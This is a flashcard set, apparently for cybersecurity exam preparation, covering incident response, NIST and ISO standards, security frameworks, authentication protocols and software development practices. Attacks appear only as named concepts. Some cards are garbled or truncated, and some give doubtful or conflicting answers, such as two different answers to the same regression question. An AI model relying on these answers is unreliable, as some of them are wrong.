What incident response activity focuses on removing any artifacts of the incident that may remain on the organization's network?
eradication
Eradication, during an incident response activity, may include: ______________.
removal of any malicious code from the network, sanitization of compromised media, and securing of compromised user accounts
Which one of the following is not a common use of formal incident reports?
sharing with other organizations
Formal incident reports should be classified and not disclosed to external parties. Formal incident reports: ______________.
create an institutional memory of the incident that is useful when developing new security controls and training new security team members, serve as an important record of the incident if there is ever legal action that results from an incident.
Which one of the following data elements would not normally be included in an evidence log?
malware signatures
Sondra determines that an attacker has gained access to a server containing critical business files and wishes to ensure that the attacker cannot delete those files. What strategy would meet Sondra's goal?
none, even removing a system from the network doesn't guarantee that the attack will not continue. An attacker can run a script on a server that detects when it has been removed from the network and then proceeds to destroy data stored on the server.
Joe would like to determine the appropriate disposition of a flash drive used to gather highly sensitive evidence during an incident response effort. He does not need to reuse the drive but wants to return it to its owner, an outside contractor. What is the appropriate disposition?
destroy
Which one of the following is not typically found in a cybersecurity incident report?
identity of the attacker
______________ should include a chronology of events, estimates of the impact, and documentation of lessons learned, in addition to other information.
Incident Reports
What NIST publication contains guidance on cybersecurity incident handling?
SP 800-61
NIST SP 800-61 is the ______________.
Computer Security Incident Handling Guide
NIST SP 800-53 is the ______________.
Security and Privacy Controls for Federal Information Systems and Organizations
NIST SP 800-88 is the ______________.
Guidelines for Media Sanitization
NIST SP 800-18 is the ______________.
Guide for Developing Security Plans for Federal Information Systems
Computer Security Incident Handling Guide
NIST SP 800-61
Security and Privacy Controls for Federal Information Systems and Organizations
NIST SP 800-53
Guidelines for Media Sanitization
NIST SP 800-88
Guide for Developing Security Plans for Federal Information Systems
NIST SP 800-18
Which one of the following is not a purging activity?
resetting to factory state
Resetting a device to factory state is an example of ______________.
data clearing
Ben is responding to a security incident and determines that the attacker is using systems on Ben's network to attack a third party. Which one of the following containment approaches will prevent Ben's systems from being used in this manner?
removal from the system
Joe is authoring a document that explains to system administrators one way that they might comply with the organization's requirement to encrypt all laptops. What type of document is Joe writing?
guideline
If someone is authoring a guideline, it indicates that ______________ with the document is not mandatory.
compliance
Which one of the following statements is not true about compensating controls under PCI DSS?
controls used to fulfill one PCI DSS requirement may be used to compensate for the absence of a control needed to meet another requirement
In ______________, controls must meet the intent and rigor of the original requirement and must provide a similar level of defense as the original requirement.
compensating controls under PCI DSS
What law creates cybersecurity obligations for healthcare providers and others in the health industry?
HIPAA
Which one of the following is not one of the five core security functions defined by the NIST Cybersecurity Framework?
contain
The five core security functions, as defined by the NIST Cybersecurity Framework are:
identify, protect, detect, respond, and recover
What International Organization for Standardization (ISO) standard applies to information security management controls?
ISO 27001
ISO 27001, is published by the International Organization for Standardization (ISO) and is titled ______________.
Information technology - Security techniques - Information security management systems - Requirements
Which document must normally be approved by the CEO or similarly high-level executive?
policy
What SABSA architecture layer corresponds to the designer's view of security architecture?
Logical Security Architecture
What SABSA architecture layer corresponds to the Architect's view of security architecture?
Conceptual Security Architecture
What SABSA architecture layer corresponds to the Business view of security architecture?
Contextual Security Architecture
What SABSA architecture layer corresponds to the Builder's view of security architecture?
Physical Security Architecture
What SABSA architecture layer corresponds to the Tradesman's view of security architecture?
Component Security Architecture
What SABSA architecture layer corresponds to the Service Manager's view?
Security Service Management Architecture
What law governs the financial records of publicly traded companies?
Sarbanes-Oxley (SOX) Act
What TOGAF domain provides the organization's approach to storing and managing information assets?
data architecture
In the TOGAF domain, __________________ defines governance and organization and explains the interaction between enterprise architecture and business strategy.
Business architecture
In the TOGAF domain, __________________ includes the applications and systems that an organization deploys, the interactions between those systems, and their relation to business processes.
Applications architecture
In the TOGAF domain, __________________ provides the organization's approach to storing and managing information assets.
Data architecture
In the TOGAF domain, __________________ describes the infrastructure needed to support the other architectural domains.
Technical architecture
The TOGAF domain also includes the __________________ which describes how an organization might move through the cyclical process of developing its own enterprise architecture.
Architecture Development Method (ADM)
__________________ is a framework that offers a comprehensive approach to IT service management within the modern enterprise.
The Information Technology Infrastructure Library (ITIL)
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of these activities and is central in the life cycle.
Service Strategy
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Design
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Operation
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Transition
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is considered continuous in the life cycle.
Continual Service Improvement
__________________ are security controls that impact the physical world: fences, perimeter lighting, locks, fire suppression systems, and burglar alarms.
Physical controls
__________________ are technical controls that enforce confidentiality, integrity, and availability in the digital space: firewall rules, access control lists, intrusion prevention systems, and encryption.
Logical controls
__________________ are procedural mechanisms that an organization follows to implement sound security management practices: user account reviews, employee background investigations, log reviews, and separation-of-duties policies.
Administrative controls
Which one of the following would not normally be found in an organization's information security policy?
Requirement to use AES-256 encryption
__________________ do not normally contain prescriptive technical guidance, such as a requirement to use a specific encryption algorithm.
Security policies
A requirement to uses AES-256 encryption would normally be found in a __________________.
security standard
Darren is helping the Human Resources department create a new policy for background checks on new hires. What type of control is Darren creating?
administrative
Which one of the following control models describes the five core activities associated with IT service management as service strategy, service design, service transition, service operation, and continual service improvement.
Information Technology Infrastructure Library (ITIL)
What compliance obligation applies to merchants and service providers who work with credit card information.
PCI DSS
The PCI DSS provides detailed rules about the __________________of credit and debit card information. PCI DSS is not a law but rather a contractual obligation that applies to credit card merchants and service providers.
storage, processing, and transmission
Which one of the following policies would typically answer questions about when an organization should destroy records?
data retention policy
While studying an organization's risk management process under the NIST Cybersecurity Framework, Rob determines that the organization adapts its cybersecurity practices based on lessons learned and predictive indicators derived from previous and current cybersecurity activities. What tier should he assign based on this measure?
Tier 4
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates organizational cybersecurity risk management practices are not formalized, and risk is managed in an ad hoc and sometimes reactive manner.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates risk management practices are approved by management but may not be established as organizational-wide policy.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates the organization's risk management practices are formally approved and expresses as policy.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates the organization adapts its cybersecurity practices based on lessons learned and predictive indicators derived from previous and current cybersecurity activities
Tier 4: Adaptive
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is limited awareness of cybersecurity risk at the organizational level and an organization-wide approach to managing cybersecurity risk has not been established.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an awareness of cybersecurity risk at the organizational level but an organization-wide approach to managing cybersecurity risk has not been established.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an organization-wide approach to manage cybersecurity risk.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an organization-wide approach to managing cybersecurity risk that uses risk-informed policies, processes, and procedures to address potential cybersecurity events.
Tier 4: Adaptive
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates an organization may not have the processes in place to participate in coordination or collaboration with other entities.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization knows its role in the larger ecosystem but has not formalized its capabilities to interact and share information externally.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization understands its dependencies and partners and receives information from these partners that enables collaboration and risk-based management decisions within the organization in response to events.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization manages risk and actively shares information with partners to ensure that accurate, current information is being distributed and consumed to improve cybersecurity before a cybersecurity event occurs.
Tier 4: Adaptive
Which one of the following security policy framework components does not contain mandatory guidance for individuals in the organization?
guideline
Compliance with ______________ is mandatory.
policies, standards, and procedures
Tina is creating a set of firewall rules designed to block denial-of-service attacks from entering her organization's network. What type of control is Tina designing?
Logical control
Allan is developing a document that lists the acceptable mechanisms for securely obtaining remote administrative access to servers in his organization. What type of document is Allan writing?
standard
______________ describe specific security controls that must be in place for an organization.
Standards
Which one of the following is not a common use of the NIST Cybersecurity Framework?
create specific technology requirements for an organization
The ______________ is designed to help organizations describe their current cybersecurity posture, describe their target state for cybersecurity, identify and prioritize opportunities for improvement, assess progress, and communicate with stakeholders about risk.
NIST Cybersecurity Framework
Shelly is writing a document that describes the steps that incident response teams will follow upon first notice of a potential incident. What type of document is she creating?
procedure
______________ provide checklist-style sets of step-by-step instructions guiding how employees should react in a given circumstance and commonly guide the early stages of incident response.
Procedures
Sue is a manager of a group of system administrators and is in charge of approving all requests for administrative rights. In her role, she files a change request to grant a staff member administrative rights and then approves it. What personnel control would best help to prevent this abuse of her role?
separation of duties
Ben wants to ensure that a single person cannot independently access his organization's secure vault. What personnel control is best suite to this need?
dual control
Lauren's departure from her organization leaves her team without a Linux systems administrator and means they no longer have in-depth knowledge of a critical business system. What should her manager have done to ensure that this issue did not have a significant impact?
succession planning
Rick is reviewing his organization's network design and is concerned that a known flaw in the border router could let an attacker disable their Internet connectivity. Which of the following is an appropriate compensatory control?
an alternate Internet connectivity method using a different router type
Fred has been assigned to review his organization's host security policies due to a recent theft of a workstation that contained sensitive data. Which of the following controls would best help to prevent a stolen machine from causing a data breach?
full disk encryption
_________________ is useful for reporting machine state and might even help locate a machine if it was reconnect to a network, but it does not protect the data a machine contains.
Central management
Full disk encryption protects sensitive data on a workstation in the event of theft occurring. _________________ would provide helpful additional capabilities, but both rely on the system connecting to a network after it is stolen.
remote wipe capabilities and machine tracking software
A member of Susan's team recently fell for a phishing scam and provided his password and personal information to a scammer. What layered security approach is not an appropriate layer for Susan to implement to protect her organization from future issues?
multi-tiered firewalls
In the event a scammer acquired passwords and personal information, _________________ would require the attacker to have the second factor in addition to the password.
multifactor authentication
Chris is in charge of his organization's Windows security standard, including their Windows XP security standard, and has recently decommissioned the organization's last Windows XP system. What is the next step in his security standard's life cycle?
retiring the Windows XP standard
Retirement is the last step at the end of the life cycle for a standard or process. This means that if the process is retired, a _________________ is not needed.
final update
Example Corporation has split their network into network zones that include sales, HR, research and development, and guest networks, each separated from the others using network security devices. What concept is Example Corporation using for their security network?
segmentation
Zoned routing is a _________________.
made up term
Which of the following layered security controls is commonly used at the WAN, LAN, and host layer in a security design?
firewalls
_________________ are commonly used to create network protection zones, to protect network borders, and at the host level to help armor the host against attacks.
Firewalls
_________________ at rest is most frequently used at the host layer.
Encryption
_________________ are typically used at the edge of a network for publicly accessible services.
DMZs
In Lauren's initial design for a secure network, she applied the same security controls to every system and network. After reviewing her design, she decided to isolate systems based on their functions and to apply controls to protected network segments for more sensitive data and systems. What two design models did she apply?
uniform protection and protected enclaves
An _________________ design would have applied protections based on information classification or control requirements.
information-based
Michelle has been asked to review her corporate network's design for single points of failure that would impact the core network operations. This is a redundant network design with a critical fault: a single point of failure that could take the network offline if it failed. What could be the single point of failure?
the internet access connected directly to the ISP
During a penetration test of Anna's company, the penetration testers were able to compromise the company's web servers and deleted their log files, preventing analysis of their attacks. What compensating control is best suited to prevent this issue in the future?
sending logs to a syslog server or bastion host
Which of the following controls is best suited to prevent vulnerabilities related to software updates?
centralized patch management software
Ben's organization uses data loss prevention software that relies on metadata tagging to ensure that sensitive files do not leave the organization. What compensating control is best suited to ensuring that data that does leave is not exposed?
encryption of all files sent outside the organization
James is concerned that network traffic from his datacenter has increased and that it may be caused by a compromise that his security tools have not identified. What SIEM analysis capability could he use to look at the traffic over time sent by his datacenter systems?
trend analysis
Angela needs to implement a control to ensure that she is notified of changes to important configuration files on her server. What type of tools should she use for this control?
file integrity checking
File integrity checking tools like _________________ can notify an administrator when changes are made to a file or directory.
Tripwire
Mike installs a firewall in front of a previously open network to prevent the systems behind the firewall from being targeted by external systems. What did Mike do?
reduced the organization's attack
During a security architecture design review, Kathleen notices that there is no written process in place to ensure that systems are returned to their normal state after a compromise. How would this control be classified?
an administrative, corrective control
Sarah's design for network security is set up where three networks (Business Confidential Network, Highly Sensitive Network, and Public Network) each have a separate firewall and are connected to a single router. What design model has she used for her network?
information-based design
Lauren is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security. How many distinct factors will she have implemented when she is done?
two
Lauren is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security. She has implemented two distinct factors in her design. If she wanted to add a third factor, what could she do?
replace either the password or PIN with a fingerprint scan or other biometric factor
What technology is best suited to protecting LDAP authentication from compromise?
TLS
LDAP authentication occurs in _________________, requiring TLS to protect the communication process.
plaintext
During an incident response process, Michelle discovers that the administrative credentials for her organization's Kerberos server have been compromised and that attackers have issued themselves a ticket without an expiration date. What is this type of ticket called?
a golden ticket
A _________________ is a Kerberos key distribution center.
KDC
Which of the following technologies is NTLM associated with?
Active Directory
Jim was originally hired into the helpdesk at his current employer but has since moved into finance. During a rights audit, it is discovered that he still has the ability to change passwords for other staff members. What is this issue called?
privilege creep
What type of attack occurs when an attacker takes advantage of OAuth open redirects to take on the identity of a legitimate user?
impersonation
OAuth redirect exploits are a form of _________________, allowing attackers to pretend to be a legitimate user.
impersonation attack
_________________takes advantage of existing sessions.
Session hijacking
_________________ attacks take advantage of being in the path of communications.
MITM
_________________ is a networking term used when reviewing packet contents.
Protocol analysis
2013's Yahoo breach resulted in almost 1 billion MD5 hashed passwords being exposed. What user behavior creates the most danger when this type of breach occurs?
password reuse
Authentication that uses the IP address, geographic location, and time of day to help validate the user is known as what type of authentication?
context based
_________________ allows authentication decisions to be made based on information about the user, the system they are using, or other data like their geographic location, behavior, or even time of day.
context-based authentication
_________________ uses a security token to generate a onetime password or value.
token-based authentication
Which of the following is not a common attack against Kerberos?
open redirect-based attacks
Common attacks against _________________ include attacks aimed at administrative accounts, particularly those that attempt to create a ticket granting ticket and ticket reuse attacks.
Kerberos
Which of the following technologies is not a shared authentication technology?
LDAP
_________________ is sometimes used for single sign-on but is not a shared authentication technology.
LDAP
OpenID Connect, Oath, and Facebook Connect are all examples of _________________.
shared authentication technologies
Angela is concerned about attackers enumerating her organization's LDAP directory. What LDAP control should she recommend to help limit the impact of this type of data gathering?
ACLs
_________________ may help with load issues or denial-of-service attacks.
LDAP replication
TACASs+?
route management traffic over a dedicated network
_________________ should be run on an isolated management network to protect it from attackers.
TACACS+
Jason has user rights on his Linux workstation, but he wants to read his department's financial reports, which he knows are stored in a directory that only administrators can access. He executes a local exploit, which gives him the ability to act as root. What type of attack is this?
privilege escalation
Chris is responsible for monitoring his organization's file shares and security and has discovered that employees are consistently retaining access to files after they change positions. Where in the organization's account life cycle should he focus his efforts?
Step 3 Modify and Maintain Account
_________________ is the first step in an account life cycle.
Create account and set password
_________________ is the second step in an account life cycle.
Provision to services and set initial rights and roles
_________________ is the third step in an account life cycle.
Modify and maintain account
_________________ is the fourth step in an account life cycle.
Disable account
_________________ is the fifth and final step in an account life cycle.
Retire and deprovision account
Which of the following methods is not an effective method for preventing brute-force password guessing attacks via login portals?
returning an HTTP error
CAPTCHAs, login throttling, and locking out accounts after a set number of failed logins are all useful techniques to stop or delay _________________ password guessing attacks.
brute-force
Which party in a federated identity service model makes assertions about identities to service providers?
identity providers (IDPs)
Which of the following reasons is not a reason to avoid using SMS as a second factor for authentication?
SMS cannot send unique tokens
NIST SP 800-63-3 recommends that _________________ be deprecated due to issues with VoIP including password reuse and the ability to redirect SMS sent via VoIP calls. It is also relatively insecure, allowing attackers with the right equipment to potentially intercept it.
SMS
Ben's successful attack on an authenticated user required him to duplicate the cookies that the web application put in place to identify the legitimate user. What type of attack did Ben conduct?
session hijacking
What types of attack can be executed against a RADIUS shared secret if attackers have valid credentials including a known password and can monitor RADIUS traffic on the network?
brute force attack
_________________ attempts to reuse previously used hashes to authenticate.
pass-the-hash
_________________ shared secrets can be brute forced if attackers can gain access to a known password and can monitor traffic on the network.
RADIUS
Michelle has a security token that her company issued to her. What type of authentication factor does she have?
Possession
Angela's software development team is working on a large-scale control package that will run a nuclear power plant for multiple decades. They want to select a software development life cycle (SDLC) that fits their needs, which includes careful up-front planning and analysis, without any anticipated change during the coding process. What SDLC model should she choose?
waterfall
Which of the following options is the most likely used for the host listed in the dhcpd.conf entry?
Host db1 {
option host-name "sqldb1.example.com";
hardware ethernet 8a:00:83:aa:21:9f
fixed address 10.1.240.10
Microsoft SQL server
What technique is being used in this command?
dig axfr @dns-server example.com
zone transfer
In incident response, ______________ would typically contain: *identifying information
-location
-serial number
-model number
-hostname
-MAC addresses and IP addresses of a computer
* the name, title, and phone number of each individual who collected or handled the evidence during the investigation
the time and date (including time zone) of each occurrence of evidence handling
* the locations where the evidence was stored.
an evidence log
During her forensic copy validation process Danielle received the following MD5 sums from her original drive and the clone image after using dd. What is likely wrong?
b4979e007e909c00a51ae208cacb169 original.img
d9ff8a0cf6bc0ab066b6416e7eabf35 clone.img
an unknown change or problem occurred
During a Fagan code inspection, which process can redirect to the planning stage?
rework
During the rework stage of the Fagan inspection, issues may be identified that require the process to return to the _____________ stage and then proceed back through the remaining stages to re-review the code.
planning
Adam is conducting software testing by reviewing the source code of the application. What type of cost testing is Adam conducting?
static code analysis
While conducting software testing, mutation testing and fuzzing are types of _____________.
dynamic analysis
Adam is conducting software testing by running the program. What type of testing is Adam conducting?
dynamic code analysis
After a major patch is released for the web application that he is responsible for, Sam proceeds to run his web application security scanner against the web application to verify that it is still secure. What is the term for the process Sam is conducting?
regression testing
Conducting a _____________ verifies that changes have not introduced new issues to an application.
regression test
How many phrases does the Spiral model cycle through?
four
The _____________ cycles through four phases: requirements gathering, design, build, and evaluation/risk analysis.
Spiral model
Charles is worried about users conducting SQL injection attacks. Which of the following solutions will best address his concerns?
performing user input validation
Charles should perform user input validation to strip out any _____________ or other unwanted input.
SQL code
_____________ management can help prevent session hijacking.
Secure Session
_____________ may provide useful information for incident investigation.
logging
Susan's team has been writing code for a major project for a year and recently released their third version of the code. During a post-implementation regression test, an issue that was originally seen in version 1 reappeared. What type of tool should Susan implement to help avoid this issue in the future?
source control management
A source control management tool like _____________ can help prevent old code from being added to current versions of an application.
Subversion or Git
Susan's team has been writing code for a major project for a year and recently released their third version of the code. During a post-implementation regression test, an issue that was originally seen in version 1 reappeared. What type of process should Susan implement to help avoid this issue in the future?
pair programming
Precompiled SQL statements that only require variables to be input are an example of what type of application security control?
parameterized queries
A parameterized query, sometimes called a _____________, uses a prebuilt SQL statement to prevent SQL-based attacks. Variables from the application are fed to the query, rather than building a custom query when the application needs data.
prepared statement
Input validation and encoding data helps to prevent_____________ attacks.
cross-site scripting
What process checks to ensure that functionality meets customer needs?
user acceptance testing (UAT)
_____________ is the process of testing to ensure that the users of the software are satisfied with its functionality.
User acceptance testing (UAT)
_____________ validates individual components of the application.
unit testing
_____________ verifies that the application will perform when under high load or other stress.
stress testing
What Agile process is used to determine whether application development is occurring at the speed that was expected?
velocity tracking
_____________ calculates the actual speed based on accomplishments versus the estimated work from the spring planning effort.
Velocity tracking
In Agile development, _____________ is used to limit the time spent on an effort, by using a previously agreed-upon time that a person or team uses to work on a specific goal. This limits the time to work on a goal rather than allowing work until completion. At the end, the completed work is assessed to determine what needs to occur next.
timeboxing
In Agile development, _____________ are lists of features or tasks that are required to complete a project.
backlogs
In Agile development, _____________ is a tool for estimation and planning used in development processes. Estimators are given cards with values for the amount of work required for a task. Estimators are asked to estimate, and each reveals their "bid" on the task. This is done until an agreement is reached, with the goal to have estimators reach the same estimate through discussion.
planning poker
In Agile development, _____________ are collected to describe high-level user requirements. An example may be "Users can change their password via a mobile app" which would provide direction for estimation and planning for an Agile work session.
user stories
In Agile development, _____________ is conducted by adding up the estimates for the current sprint's effort and then comparing that to what was completed. This tells the team whether they are on track, faster, or slower than expected.
velocity tracking
Using TLS to protect application traffic helps satisfy which of the OWASP 2016 best practices?
protect data
_____________ satisfies the "protects data" OWASP 2016 best practices by ensuring that network traffic is secure.
TLS
Kristin wants to implement code review but has a distributed team that works at various times during the day. She also does not want to create any additional support load for her team with new development environment applications. What type of review process will work best for her needs?
pass-around
_____________ normally rely on email to move code between developers.
pass-around reviews
_____________ require implementation of a tool to specifically support the review.
tool-assisted reviews
_____________ reviews require developers to work together.
pair programming and over-the shoulder
Waterfall and Spiral use _____________ processes.
linear
Agile software development is an _____________ process.
iterative and incremental
During the _____________ phase, gathering user stories and design would be a part of the process.
sprint planning
Using the Agile sprint process, what step will occur at step two?
development
When is the Agile sprint complete?
when customers agree that the task is done or the time allocated for the sprint is complete
What process is used to ensure that an application can handle very high numbers of concurrent users or sessions?
load testing
Fuzzing, mutation testing, and fault injection are all types of _____________.
code review and testing
Lauren wants to insert data into the response from her browser to a web application. What type of tool should she use if she wants to easily make manual changes in what her browser sends out as she interacts with the website?
interception proxy
_____________ are designed to allow testers to intercept, view, and modify traffic sent from web browsers and are often used for penetration testing and web application security testing.
interception proxies
_____________ are used for application testing by sending invalid data to the application.
fuzzers
What type of testing focuses on inserting problems into the error handling processes and paths in an application?
fault injection
_____________ describes any type of live application testing.
dynamic code analysis
What type of code review requires two programmers, one of whom explains their code to the other developer?
over-the-shoulder
The difference between over-the-shoulder code review and _____________ is over-the-shoulder requires two programmers, one explains their code to the other; the latter also uses two developers but allows the developers to swap roles between writing code and observing and strategizing.
pair programming
What term is used to describe high-level requirements in Agile development efforts?
user stories
After running an nmap scan of a system, you receive scan data that indicates the following three ports are open: 22/TCP, 443/TCP, and 1521/TCP. What services commonly run on these ports?
SSH, HTTPS, Oracle
Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance?
whois
What type of system allows attackers to believe they have succeeded with their attack, thus providing defenders with information about their attack methods and tools?
honeypot
What cybersecurity objective could be achieved by running your organization's web servers in redundant, geographically separate datacenters?
availability
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
authenticated
An authenticated or _________________ scan provides the most detailed view of the system.
credentialed
In early 2017, a flaw was discovered in the Chakra JavaScript scripting engine in Microsoft's Edge browser that could allow remote execution or denial of service via a specially crafted website. The CVSS 3.0 score for this reads: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H. What is the attack vector and the impact to integrity based on this rating?
Network, High
Alice is a security engineer tasked with performing vulnerability scans for her organization. She encounters a false positive error in one of her scans. What should she do about this?
verify that it is a false positive and then document the exception
Which phase of the incident response process is most likely to include gathering additional evidence such as information that would support legal action?
containment, eradication and recovery phase
Which of the following descriptions explains an integrity loss?
sensitive or proprietary information was changed or deleted
Which of the following techniques is an example of active monitoring?
ping
RMON and netflows are examples of _________________ monitoring.
router-based
_________________ allow passive monitoring.
network taps
Ben's monitoring detects regular traffic sent from a system that is suspected to be compromised and participating in a botnet to a set of remote IP addresses. What is this called?
beaconing
Which of the following tools is not useful for monitoring memory usage in Linux?
df
Which Linux commands can show information about memory usage?
top, ps, and free
In Linux, the _________________ command is used to show the amount of free and used disk space.
df
Which of the following tools cannot be used to make a forensic disk image?
xcopy
FTK, EnCase, and dd all provide options that support their use for _________________.
forensic disk image creation
During a forensic investigation, Shelly is told to look for information in slack space on the drive. Where should she look, and what is she most likely to find?
She should look at unused space left when a file is written, and she is likely to find file fragments from deleted files.
What type of system is used to contain an attacker to allow them to be monitored?
a sandbox
Bob's manager has asked him to ensure that a compromised system has been completely purged of the compromise. What is Bob's best course of action?
wipe and rebuild the system
What level of secure media disposition as defined by NIST SP-800-88 is best suited to a hard drive from a high-security system that will be reused in the same company by an employee of a different level or job type?
purge
A statement like "Windows workstations must have the current security configuration template applied to them before being deployed" is most likely to be part of which document.
standards
_________________ contain high-level statements of management intent.
policies
_________________ provide mandatory requirements for how policies are carried out.
standards
A _________________ would include the step-by-step process.
procedure
A _________________ describes a best practice or recommendation.
guideline
Jim is concerned with complying with the U.S. federal law covering student educational records. Which of the following laws is he attempting to comply with?
Family Educational Rights and Privacy Act (FERPA)
_________________ requires educational institutions to implement security and privacy controls for student educational records.
Family Educational Rights and Privacy Act (FERPA)
_________________ covers security and privacy for healthcare providers, health insurers, and health information clearinghouses.
HIPPA
_________________ covers financial institutions.
GLBA
_________________ applies to financial records of publicly traded companies.
SOX
A fire suppression system is an example of what type of control?
physical
_________________ are technical controls that enforce confidentiality, integrity, and availability.
logical controls
_________________ are procedural controls.
administrative controls
Lauren is concerned that Danielle and Alex are conspiring to use their access to defraud their organization. What personnel control will allow Lauren to review their actions to find any issues?
separation of duties
Joe wants to implement an authentication protocol that is well suited to untrusted networks. Which of the following options is best suited to his needs in its default state?
Kerberos
_________________ is designed to run on untrusted networks and encrypts authentication traffic by default.
Kerberos
As an authentication protocol, _________________ can be encrypted but are not necessarily encrypted by default.
LDAP and RADIUS
It is recommended that _________________ be run only on isolated administrative networks as an authentication protocol.
TACACS+
Which software development life cycle model uses linear development concepts in an iterative, four-phase process?
Spiral
The Spiral model uses linear development concepts like those used in _________________, but repeats four phases through its life cycle: requirements gathering, design, build, and evaluation.
Waterfall